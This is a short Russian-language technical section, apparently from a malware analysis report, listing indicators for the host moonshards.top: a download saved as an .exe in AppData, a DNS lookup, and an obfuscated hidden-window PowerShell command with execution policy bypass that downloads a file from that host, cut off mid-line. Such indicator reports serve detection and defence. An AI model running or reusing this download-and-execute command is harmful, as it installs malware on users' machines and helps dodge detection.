Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwersheLL^.exe^ -exECutI^oNp^OliC^y By^PAsS ^-nOprOF^iLe -w^IndOwst^Yle hiDD^En (new-Obj^EcT^ SY^StEM^.neT.W^E^bCli^e^nT).dO^WnLoaDfILE^('http://moonshards.top/search.ph...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /c "p^OwersheLL^.exe^ -exECutI^oNp^OliC^y By^PAsS ^-nOprOF^iLe -w^IndOwst^Yle hiDD^En (new-Obj^EcT^ SY^StEM^.neT.W^E^bCli^e^nT).dO^WnLoaDfILE^('http://moonshards.top/search.ph...' (со скрытым окном)